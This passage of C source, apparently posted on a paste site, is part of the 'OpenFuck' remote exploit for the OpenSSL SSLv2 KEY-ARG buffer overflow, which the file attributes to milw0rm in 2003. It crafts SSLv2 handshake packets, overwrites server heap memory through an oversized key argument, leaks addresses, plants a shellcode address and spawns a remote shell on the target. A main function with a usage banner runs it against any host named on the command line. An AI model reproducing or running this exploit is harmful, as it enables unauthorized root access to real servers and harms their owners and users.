  935. /* the sequence number is incremented by both encrypted and plaintext packets
  936. */
  937. ssl->write_seq++;
  938. }
  939.  
  940. /* Send a CLIENT HELLO message to the server */
  941. void send_client_hello(ssl_conn *ssl)
  942. {
  943. int i;
  944. unsigned char buf[BUFSIZE] =
  945. "\x01" /* client hello msg */
  946.  
  947. "\x00\x02" /* client version */
  948. "\x00\x18" /* cipher specs length */
  949. "\x00\x00" /* session id length */
  950. "\x00\x10" /* challenge length */
  951.  
  952. "\x07\x00\xc0\x05\x00\x80\x03\x00" /* cipher specs data */
  953. "\x80\x01\x00\x80\x08\x00\x80\x06"
  954. "\x00\x40\x04\x00\x80\x02\x00\x80"
  955.  
  956. ""; /* session id data */
  957.  
  958. /* generate CHALLENGE LENGTH bytes of challenge data */
  959. for (i = 0; i < CHALLENGE_LENGTH; i++) {
  960. ssl->challenge[i] = (unsigned char) (rand() >> 24);
  961. }
  962. memcpy(&buf[33], ssl->challenge, CHALLENGE_LENGTH);
  963.  
  964. send_ssl_packet(ssl, buf, 33 + CHALLENGE_LENGTH);
  965. }
  966.  
  967. /* Get a SERVER HELLO response from the server */
  968. void get_server_hello(ssl_conn* ssl)
  969. {
  970. unsigned char buf[BUFSIZE];
  971. const unsigned char *p, *end;
  972. int len;
  973. int server_version, cert_length, cs_length, conn_id_length;
  974. int found;
  975.  
  976. if (!(len = read_ssl_packet(ssl, buf, sizeof(buf)))) {
  977. printf("Server error: %s\n", ssl_error(ntohs(*(uint16_t*)&buf[1])));
  978. exit(1);
  979. }
  980. if (len < 11) {
  981. printf("get_server_hello: Packet too short (len = %d)\n", len);
  982. exit(1);
  983. }
  984.  
  985. p = buf;
  986.  
  987. if (*(p++) != SSL2_MT_SERVER_HELLO) {
  988. printf("get_server_hello: Expected SSL2 MT SERVER HELLO, got %x\n", (int)p[-1]);
  989. exit(1);
  990. }
  991.  
  992. if (*(p++) != 0) {
  993. printf("get_server_hello: SESSION-ID-HIT is not 0\n");
  994. exit(1);
  995. }
  996.  
  997. if (*(p++) != 1) {
  998. printf("get_server_hello: CERTIFICATE-TYPE is not SSL CT X509 CERTIFICATE\n");
  999. exit(1);
  1000. }
  1001.  
  1002. n2s(p, server_version);
  1003. if (server_version != 2) {
  1004. printf("get_server_hello: Unsupported server version %d\n", server_version);
  1005. exit(1);
  1006. }
  1007.  
  1008. n2s(p, cert_length);
  1009. n2s(p, cs_length);
  1010. n2s(p, conn_id_length);
  1011.  
  1012. if (len != 11 + cert_length + cs_length + conn_id_length) {
  1013. printf("get_server_hello: Malformed packet size\n");
  1014. exit(1);
  1015. }
  1016.  
  1017. /* read the server certificate */
  1018. ssl->x509 = NULL;
  1019. ssl->x509=d2i_X509(NULL,&p,(long)cert_length);
  1020. if (ssl->x509 == NULL) {
  1021. printf("get server hello: Cannot parse x509 certificate\n");
  1022. exit(1);
  1023. }
  1024.  
  1025. if (cs_length % 3 != 0) {
  1026. printf("get server hello: CIPHER-SPECS-LENGTH is not a multiple of 3\n");
  1027. exit(1);
  1028. }
  1029.  
  1030. found = 0;
  1031. for (end=p+cs_length; p < end; p += 3) {
  1032. if ((p[0] == 0x01) && (p[1] == 0x00) && (p[2] == 0x80))
  1033. found = 1; /* SSL CK RC4 128 WITH MD5 */
  1034. }
  1035.  
  1036. if (!found) {
  1037. printf("get server hello: Remote server does not support 128 bit RC4\n");
  1038. exit(1);
  1039. }
  1040.  
  1041. if (conn_id_length > SSL2_MAX_CONNECTION_ID_LENGTH) {
  1042. printf("get server hello: CONNECTION-ID-LENGTH is too long\n");
  1043. exit(1);
  1044. }
  1045.  
  1046. /* The connection id is sent back to the server in the CLIENT FINISHED packet */
  1047. ssl->conn_id_length = conn_id_length;
  1048. memcpy(ssl->conn_id, p, conn_id_length);
  1049. }
  1050.  
  1051. /* Send a CLIENT MASTER KEY message to the server */
  1052.  
  1053. void send_client_master_key(ssl_conn* ssl, unsigned char* key_arg_overwrite, int key_arg_overwrite_len) {
  1054. int encrypted_key_length, key_arg_length, record_length;
  1055. unsigned char* p;
  1056. int i;
  1057. EVP_PKEY *pkey=NULL;
  1058.  
  1059. unsigned char buf[BUFSIZE] =
  1060. "\x02" /* client master key message */
  1061. "\x01\x00\x80" /* cipher kind */
  1062. "\x00\x00" /* clear key length */
  1063. "\x00\x40" /* encrypted key length */
  1064. "\x00\x08"; /* key arg length */
  1065.  
  1066. p = &buf[10];
  1067.  
  1068. /* generate a 128 byte master key */
  1069. for (i = 0; i < RC4_KEY_LENGTH; i++) {
  1070. ssl->master_key[i] = (unsigned char) (rand() >> 24);
  1071. }
  1072.  
  1073. pkey=X509_get_pubkey(ssl->x509);
  1074. if (!pkey) {
  1075. printf("send client master key: No public key in the server certificate\n");
  1076. exit(1);
  1077. }
  1078.  
  1079. // if (pkey->type != EVP_PKEY_RSA) {
  1080. if (EVP_PKEY_get1_RSA(pkey) == NULL) {
  1081. printf("send client master key: The public key in the server certificate is not a RSA key\n");
  1082. exit(1);
  1083. }
  1084.  
  1085. /* Encrypt the client master key with the server public key and put it in the packet */
  1086. // encrypted_key_length = RSA_public_encrypt(RC4_KEY_LENGTH, ssl->master_key, &buf[10], pkey->pkey.rsa, RSA_PKCS1_PADDING);
  1087. encrypted_key_length = RSA_public_encrypt(RC4_KEY_LENGTH, ssl->master_key, &buf[10], EVP_PKEY_get1_RSA(pkey), RSA_PKCS1_PADDING);
  1088. if (encrypted_key_length <= 0) {
  1089. printf("send client master key: RSA encryption failure\n");
  1090. exit(1);
  1091. }
  1092.  
  1093. p += encrypted_key_length;
  1094.  
  1095. if (key_arg_overwrite) {
  1096. /* These 8 bytes fill the key arg array on the server */
  1097. for (i = 0; i < 8; i++) {
  1098. *(p++) = (unsigned char) (rand() >> 24);
  1099. }
  1100. /* This overwrites the data following the key arg array */
  1101. memcpy(p, key_arg_overwrite, key_arg_overwrite_len);
  1102.  
  1103. key_arg_length = 8 + key_arg_overwrite_len;
  1104. }
  1105. else {
  1106. key_arg_length = 0; /* RC4 doesn't use KEY-ARG */
  1107. }
  1108. p = &buf[6];
  1109. s2n(encrypted_key_length, p);
  1110. s2n(key_arg_length, p);
  1111. record_length = 10 + encrypted_key_length + key_arg_length;
  1112. send_ssl_packet(ssl, buf, record_length);
  1113. ssl->encrypted = 1;
  1114. }
  1115. void generate_key_material(ssl_conn* ssl)
  1116. {
  1117. unsigned int i;
  1118. MD5_CTX ctx;
  1119. unsigned char *km;
  1120. unsigned char c='0';
  1121.  
  1122. km=ssl->key_material;
  1123. for (i=0; i<RC4_KEY_MATERIAL_LENGTH; i+=MD5_DIGEST_LENGTH) {
  1124. MD5_Init(&ctx);
  1125.  
  1126. MD5_Update(&ctx,ssl->master_key,RC4_KEY_LENGTH);
  1127. MD5_Update(&ctx,&c,1);
  1128. c++;
  1129. MD5_Update(&ctx,ssl->challenge,CHALLENGE_LENGTH);
  1130. MD5_Update(&ctx,ssl->conn_id, ssl->conn_id_length);
  1131. MD5_Final(km,&ctx);
  1132. km+=MD5_DIGEST_LENGTH;
  1133. }
  1134. }
  1135. void generate_session_keys(ssl_conn* ssl)
  1136. {
  1137. generate_key_material(ssl);
  1138. ssl->read_key = &(ssl->key_material[0]);
  1139. ssl->rc4_read_key = (RC4_KEY*) malloc(sizeof(RC4_KEY));
  1140. RC4_set_key(ssl->rc4_read_key, RC4_KEY_LENGTH, ssl->read_key);
  1141.  
  1142. ssl->write_key = &(ssl->key_material[RC4_KEY_LENGTH]);
  1143. ssl->rc4_write_key = (RC4_KEY*) malloc(sizeof(RC4_KEY));
  1144. RC4_set_key(ssl->rc4_write_key, RC4_KEY_LENGTH, ssl->write_key);
  1145. }
  1146. void get_server_verify(ssl_conn* ssl)
  1147. {
  1148. unsigned char buf[BUFSIZE];
  1149. int len;
  1150. if (!(len = read_ssl_packet(ssl, buf, sizeof(buf)))) {
  1151. printf("Server error: %s\n", ssl_error(ntohs(*(uint16_t*)&buf[1])));
  1152. exit(1);
  1153. }
  1154. if (len != 1 + CHALLENGE_LENGTH) {
  1155. printf("get server verify: Malformed packet size\n");
  1156. exit(1);
  1157. }
  1158. if (buf[0] != SSL2_MT_SERVER_VERIFY) {
  1159. printf("get server verify: Expected SSL2 MT SERVER VERIFY, got %x\n", (int)buf[0]);
  1160. exit(1);
  1161. }
  1162. if (memcmp(ssl->challenge, &buf[1], CHALLENGE_LENGTH)) {
  1163. printf("get server verify: Challenge strings don't match\n");
  1164. exit(1);
  1165. }
  1166. }
  1167. void send_client_finished(ssl_conn* ssl)
  1168. {
  1169. unsigned char buf[BUFSIZE];
  1170. buf[0] = SSL2_MT_CLIENT_FINISHED;
  1171. memcpy(&buf[1], ssl->conn_id, ssl->conn_id_length);
  1172. send_ssl_packet(ssl, buf, 1+ssl->conn_id_length);
  1173. }
  1174. void get_server_finished(ssl_conn* ssl)
  1175. {
  1176. unsigned char buf[BUFSIZE];
  1177. int len;
  1178. int i;
  1179. if (!(len = read_ssl_packet(ssl, buf, sizeof(buf)))) {
  1180. printf("Server error: %s\n", ssl_error(ntohs(*(uint16_t*)&buf[1])));
  1181. exit(1);
  1182. }
  1183. if (buf[0] != SSL2_MT_SERVER_FINISHED) {
  1184. printf("get server finished: Expected SSL2 MT SERVER FINISHED, got %x\n", (int)buf[0]);
  1185. exit(1);
  1186. }
  1187.  
  1188. if (len <= 112 /*17*/) {
  1189. printf("This server is not vulnerable to this attack.\n");
  1190. exit(1);
  1191. }
  1192. cipher = *(int*)&buf[101];
  1193. ciphers = *(int*)&buf[109];
  1194. printf("cipher: 0x%x ciphers: 0x%x\n", cipher, ciphers);
  1195. }
  1196. void get_server_error(ssl_conn* ssl)
  1197. {
  1198. unsigned char buf[BUFSIZE];
  1199. int len;
  1200.  
  1201. if ((len = read_ssl_packet(ssl, buf, sizeof(buf))) > 0) {
  1202. printf("get server finished: Expected SSL2 MT ERROR, got %x\n", (int)buf[0]);
  1203. exit(1);
  1204. }
  1205. }
  1206. void usage(char* argv0)
  1207. {
  1208. int i;
  1209. printf(": Usage: %s target box [port] [-c N]\n\n", argv0);
  1210. printf(" target - supported box eg: 0x00\n");
  1211. printf(" box - hostname or IP address\n");
  1212. printf(" port - port for ssl connection\n");
  1213. printf(" -c open N connections. (use range 40-50 if u dont know)\n");
  1214. printf(" \n\n");
  1215. printf(" Supported OffSet:\n");
  1216.  
  1217. for (i=0; i<=MAX_ARCH; i++) {
  1218. printf("\t0x%02x - %s\n", i, architectures[i].desc);
  1219. }
  1220. printf("\nFuck to all guys who like use lamah ddos. Read SRC to have no surprise\n");
  1221.  
  1222. exit(1);
  1223. }
  1224. int main(int argc, char* argv[])
  1225. {
  1226. char* host;
  1227. int port = 443;
  1228. int i;
  1229. int arch;
  1230. int N = 0;
  1231. ssl_conn* ssl1;
  1232. ssl_conn* ssl2;
  1233.  
  1234. printf("\n");
  1235. printf("*******************************************************************\n");
  1236. printf("* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *\n");
  1237. printf("*******************************************************************\n");
  1238. printf("* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *\n");
  1239. printf("* #hackarena irc.brasnet.org *\n");
  1240. printf("* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *\n");
  1241. printf("* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *\n");
  1242. printf("* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *\n");
  1243. printf("*******************************************************************\n");
  1244. printf("\n");
  1245. if ((argc < 3) || (argc > 6))
  1246. usage(argv[0]);
  1247. sscanf(argv[1], "0x%x", &arch);
  1248. if ((arch < 0) || (arch > MAX_ARCH))
  1249. usage(argv[0]);
  1250. host = argv[2];
  1251. if (argc == 4)
  1252. port = atoi(argv[3]);
  1253. else if (argc == 5) {
  1254. if (strcmp(argv[3], "-c"))
  1255. usage(argv[0]);
  1256. N = atoi(argv[4]);
  1257. }
  1258. else if (argc == 6) {
  1259. port = atoi(argv[3]);
  1260. if (strcmp(argv[4], "-c"))
  1261. usage(argv[0]);
  1262. N = atoi(argv[5]);
  1263. }
  1264. srand(0x31337);
  1265. for (i=0; i<N; i++) {
  1266. printf("\rConnection... %d of %d", i+1, N);
  1267. fflush(stdout);
  1268. connect_host(host, port);
  1269. usleep(100000);
  1270. }
  1271. if (N) printf("\n");
  1272. printf("Establishing SSL connection\n");
  1273. ssl1 = ssl_connect_host(host, port);
  1274. ssl2 = ssl_connect_host(host, port);
  1275. send_client_hello(ssl1);
  1276. get_server_hello(ssl1);
  1277. send_client_master_key(ssl1, overwrite_session_id_length, sizeof(overwrite_session_id_length)-1);
  1278. generate_session_keys(ssl1);
  1279. get_server_verify(ssl1);
  1280. send_client_finished(ssl1);
  1281. get_server_finished(ssl1);
  1282. printf("Ready to send shellcode\n");
  1283. port = get_local_port(ssl2->sock);
  1284. overwrite_next_chunk[FINDSCKPORTOFS] = (char) (port & 0xff);
  1285. overwrite_next_chunk[FINDSCKPORTOFS+1] = (char) ((port >> 8) & 0xff);
  1286. *(int*)&overwrite_next_chunk[156] = cipher;
  1287. *(int*)&overwrite_next_chunk[192] = architectures[arch].func_addr - 12;
  1288. *(int*)&overwrite_next_chunk[196] = ciphers + 16; /* shellcode address */
  1289. send_client_hello(ssl2);
  1290. get_server_hello(ssl2);
  1291. send_client_master_key(ssl2, overwrite_next_chunk, sizeof(overwrite_next_chunk)-1);
  1292. generate_session_keys(ssl2);
  1293. get_server_verify(ssl2);
  1294. for (i = 0; i < ssl2->conn_id_length; i++) {
  1295. ssl2->conn_id[i] = (unsigned char) (rand() >> 24);
  1296. }
  1297. send_client_finished(ssl2);
  1298. get_server_error(ssl2);
  1299. printf("Spawning shell...\n");
  1300. sleep(1);
  1301. sh(ssl2->sock);
  1302. close(ssl2->sock);
  1303. close(ssl1->sock);
  1304. return 0;
  1305. }
  1306. /* spabam: It isn't 0day */
  1307.  
  1308. // milw0rm.com [2003-04-04]
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement